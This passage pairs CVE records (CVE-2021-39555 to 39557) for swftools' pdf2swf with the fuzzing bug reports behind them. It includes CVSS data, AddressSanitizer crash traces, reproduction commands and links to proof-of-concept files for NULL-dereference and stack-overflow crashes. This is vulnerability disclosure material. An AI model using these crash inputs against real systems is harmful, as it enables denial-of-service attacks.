unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #224 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #225 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #226 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #227 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #228 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #229 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #230 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #231 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #232 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #233 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #234 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #235 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #236 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #237 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #238 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #239 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #240 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #241 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #242 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #243 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #244 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #245 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #246 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #247 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #248 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #249 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #250 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #251 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #252 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #253 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #254 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #255 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #256 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #257 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #258 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #259 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #260 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #261 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #262 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #263 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #264 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #265 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #266 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #267 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #268 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #269 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #270 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #271 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #272 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #273 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #274 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #275 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #276 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #277 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #278 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #279 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #280 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #281 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #282 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #283 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #284 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #285 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #286 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #287 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #288 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #289 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #290 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #291 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #292 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #293 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #294 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #295 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #296 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #297 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #298 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #299 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #300 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #301 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #302 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #303 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #304 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #305 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #306 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #307 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #308 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #309 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #310 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #311 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #312 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #313 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #314 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #315 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #316 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #317 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #318 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #319 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #320 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #321 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #322 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #323 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #324 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #325 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #326 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #327 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #328 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #329 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #330 0x560f6b08bddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #331 0x560f6b08bddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #332 0x560f6b08dbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #333 0x560f6b084ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 SUMMARY: AddressSanitizer: stack-overflow ??:0 ?? ==78316==ABORTING ``` ## POC [stack-overflow-Stream-598.zip](https://github.com/matthiaskramm/swftools/files/5009709/stack-overflow-Stream-598.zip)
A Segmentation fault in xpdf/Lexer.cc:53
https://api.github.com/repos/swftools/swftools/issues/100/comments
0
2020-08-01T02:16:31Z
2020-08-01T02:16:31Z
https://github.com/swftools/swftools/issues/100
670,435,303
100
2,565
CVE-2021-39555
2021-09-20T16:15:13.270
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function InfoOutputDev::type3D0() located in InfoOutputDev.cc. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/99" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/99" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/99
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), pdf2swf (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./pdf2swf -qq -z -o /dev/null ./SEGV-type3D0-InfoOutputDev-880 ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==67223==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x55e7a871efe0 bp 0x0c1a000019b0 sp 0x7ffe4b1c6f00 T0) #0 0x55e7a871efdf in InfoOutputDev::type3D0(GfxState*, double, double) /home/seviezhou/swftools/lib/pdf/InfoOutputDev.cc:880 #1 0x55e7a85c15e5 in Gfx::go(int) xpdf/Gfx.cc:584 #2 0x55e7a85c2e9f in Gfx::display(Object*, int) xpdf/Gfx.cc:556 #3 0x55e7a8561e20 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) xpdf/Page.cc:317 #4 0x55e7a8562d4a in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) xpdf/Page.cc:266 #5 0x55e7a84645af in pdf_open /home/seviezhou/swftools/lib/pdf/pdf.cc:542 #6 0x55e7a82e67d5 in main /home/seviezhou/swftools/src/pdf2swf.c:737 #7 0x7f02969f0b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55e7a82eff09 in _start (/home/seviezhou/swftools/src/pdf2swf+0x17cf09) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/swftools/lib/pdf/InfoOutputDev.cc:880 InfoOutputDev::type3D0(GfxState*, double, double) ==67223==ABORTING ``` ## POC [SEGV-type3D0-InfoOutputDev-880.zip](https://github.com/matthiaskramm/swftools/files/5009696/SEGV-type3D0-InfoOutputDev-880.zip)
A Segmentation fault in InfoOutputDev.cc:880
https://api.github.com/repos/swftools/swftools/issues/99/comments
0
2020-08-01T02:10:19Z
2020-08-01T02:10:19Z
https://github.com/swftools/swftools/issues/99
670,432,001
99
2,566
CVE-2021-39556
2021-09-20T16:15:13.313
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function InfoOutputDev::type3D1() located in InfoOutputDev.cc. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/105" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/105" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/105
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), pdf2swf (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./pdf2swf -qq -z -o /dev/null ./SEGV-type3D1-InfoOutputDev-887 ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==10741==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000048 (pc 0x5653bc913184 bp 0x000000000007 sp 0x7fffd8dd2fd0 T0) #0 0x5653bc913183 in InfoOutputDev::type3D1(GfxState*, double, double, double, double, double, double) /home/seviezhou/swftools/lib/pdf/InfoOutputDev.cc:887 #1 0x5653bc7b55e5 in Gfx::go(int) xpdf/Gfx.cc:584 #2 0x5653bc7b6e9f in Gfx::display(Object*, int) xpdf/Gfx.cc:556 #3 0x5653bc755e20 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) xpdf/Page.cc:317 #4 0x5653bc756d4a in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) xpdf/Page.cc:266 #5 0x5653bc6585af in pdf_open /home/seviezhou/swftools/lib/pdf/pdf.cc:542 #6 0x5653bc4da7d5 in main /home/seviezhou/swftools/src/pdf2swf.c:737 #7 0x7efd90625b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x5653bc4e3f09 in _start (/home/seviezhou/swftools/src/pdf2swf+0x17cf09) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/swftools/lib/pdf/InfoOutputDev.cc:887 InfoOutputDev::type3D1(GfxState*, double, double, double, double, double, double) ==10741==ABORTING ``` ## POC [SEGV-type3D1-InfoOutputDev-887.zip](https://github.com/matthiaskramm/swftools/files/5009967/SEGV-type3D1-InfoOutputDev-887.zip)
A Segmentation fault in InfoOutputDev.cc:887
https://api.github.com/repos/swftools/swftools/issues/105/comments
0
2020-08-01T07:01:24Z
2020-08-01T07:01:24Z
https://github.com/swftools/swftools/issues/105
670,599,501
105
2,567
CVE-2021-39557
2021-09-20T16:15:13.357
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function copyString() located in gmem.cc. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/97" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/97" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/97
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), pdf2swf (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./pdf2swf -qq -z -o /dev/null ./stack-overflow-gmalloc-gmem-101 ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==17568==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd339d4fe8 (pc 0x7f12da79277b bp 0x7ffd339d58f0 sp 0x7ffd339d4fe0 T0) #0 0x7f12da79277a (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x2277a) #1 0x7f12da8085e2 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x985e2) #2 0x55a5e5dc711a in gmalloc(int, bool) xpdf/gmem.cc:101 #3 0x55a5e5dc79b8 in copyString xpdf/gmem.cc:301 #4 0x55a5e5e3b0c0 in Object::initCmd(char*) xpdf/Object.h:103 #5 0x55a5e5e3b0c0 in Lexer::getObj(Object*) xpdf/Lexer.cc:467 #6 0x55a5e5e376ab in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:108 #7 0x55a5e5e37d0d in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:85 #8 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #9 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #10 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #11 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #12 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #13 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #14 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #15 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #16 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #17 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #18 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #19 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #20 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #21 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #22 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #23 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #24 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #25 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #26 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #27 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #28 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #29 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #30 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #31 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #32 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #33 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #34 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #35 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #36 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #37 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #38 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #39 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #40 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #41 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #42 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #43 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #44 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #45 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #46 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #47 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #48 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #49 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #50 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #51 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #52 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #53 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) 